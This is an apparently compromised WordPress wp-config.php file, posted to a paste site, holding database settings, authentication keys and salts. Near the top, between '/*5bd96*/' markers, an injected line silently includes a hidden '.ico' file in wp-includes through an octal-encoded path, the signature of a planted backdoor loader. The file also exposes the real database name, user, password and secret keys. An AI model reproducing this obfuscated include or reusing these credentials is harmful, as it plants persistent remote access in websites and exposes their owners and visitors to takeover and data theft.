· 6 years ago · Jun 02, 2019, 06:32 PM
1<?php
2/*5bd96*/
3
4@include "\057h\157m\145/\163d\141c\141m\160/\146t\160/\163u\155m\145r\0620\0619\057w\160-\151n\143l\165d\145s\057r\141n\144o\155_\143o\155p\141t\057.\1414\063c\0616\144a\056i\143o";
5
6/*5bd96*/
7/**
8 * The base configuration for WordPress
9 *
10 * The wp-config.php creation script uses this file during the
11 * installation. You don't have to use the web site, you can
12 * copy this file to "wp-config.php" and fill in the values.
13 *
14 * This file contains the following configurations:
15 *
16 * * MySQL settings
17 * * Secret keys
18 * * Database table prefix
19 * * ABSPATH
20 *
21 * @link https://codex.wordpress.org/Editing_wp-config.php
22 *
23 * @package WordPress
24 */
25
26// ** MySQL settings - You can get this info from your web host ** //
27/** The name of the database for WordPress */
28define( 'DB_NAME', 'sdacamp_summer2019' );
29
30/** MySQL database username */
31define( 'DB_USER', 'sdacamp_summer2019' );
32
33/** MySQL database password */
34define( 'DB_PASSWORD', 'Summer2019!@#' );
35
36/** MySQL hostname */
37define( 'DB_HOST', 'localhost' );
38
39/** Database Charset to use in creating database tables. */
40define( 'DB_CHARSET', 'utf8mb4' );
41
42/** The Database Collate type. Don't change this if in doubt. */
43define( 'DB_COLLATE', '' );
44
45/**#@+
46 * Authentication Unique Keys and Salts.
47 *
48 * Change these to different unique phrases!
49 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
50 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
51 *
52 * @since 2.6.0
53 */
54define( 'AUTH_KEY', '-Lr7~j-u*5 )DJhz0D3jv)^0[CDTe9@h5r ||SFo:c~Jv}ZkuN`BUyr~1eq]<46D' );
55define( 'SECURE_AUTH_KEY', '=AiozvN&+<%CoBq=oy#. 5 !tL@,@roLupGf5TZ vpw8?=I!]r5!~+s/6,w0<Y&r' );
56define( 'LOGGED_IN_KEY', '<jna{o_PcEe&r(I`v]$!d1,S;AacGD_DwG4|gk|<`j[53|_2^|..E7,R|C]>T^@^' );
57define( 'NONCE_KEY', 'HvNC{X$_<N+0xy`21<Dy|)<bj+,#j$:+T|0dP5IqDY!}(M3>.M+uEg/;YwS,R#_4' );
58define( 'AUTH_SALT', '|vf:eW%]~/L;YPfyp<!_jEF)9zrQox<||z(F;]I :oFKN5mc8kUxjNPb33bO.W4u' );
59define( 'SECURE_AUTH_SALT', '_d!@a68^$Z-piXGx4.z:Y5)!kg3&.np2<KVw90YJvOGDIOKWQk(NQwc&kxA;%x~/' );
60define( 'LOGGED_IN_SALT', '((2@.+|e%.7iYJT=,OqT&YJF_IMD{m!T5`aunI;%Jh(U+bo)p/,<>@:QN<@SXES&' );
61define( 'NONCE_SALT', 'H.[yw}QOq.38N{ih/eEczTzt70nXWc:+]vTBq6K~H(~F,tv78g#zF1NRgmg2_6SN' );
62
63/**#@-*/
64
65/**
66 * WordPress Database Table prefix.
67 *
68 * You can have multiple installations in one database if you give each
69 * a unique prefix. Only numbers, letters, and underscores please!
70 */
71$table_prefix = 'wp_';
72
73/**
74 * For developers: WordPress debugging mode.
75 *
76 * Change this to true to enable the display of notices during development.
77 * It is strongly recommended that plugin and theme developers use WP_DEBUG
78 * in their development environments.
79 *
80 * For information on other constants that can be used for debugging,
81 * visit the Codex.
82 *
83 * @link https://codex.wordpress.org/Debugging_in_WordPress
84 */
85define( 'WP_DEBUG', true );
86define( 'WP_DEBUG_LOG', true );
87
88/* That's all, stop editing! Happy publishing. */
89
90/** Absolute path to the WordPress directory. */
91if ( ! defined( 'ABSPATH' ) ) {
92 define( 'ABSPATH', dirname( __FILE__ ) . '/' );
93}
94
95/** Sets up WordPress vars and included files. */
96require_once( ABSPATH . 'wp-settings.php' );
97
98define('DISALLOW_FILE_EDIT', true);
99define('DISALLOW_FILE_MODS', false);
100define('WP_MEMORY_LIMIT', '256M');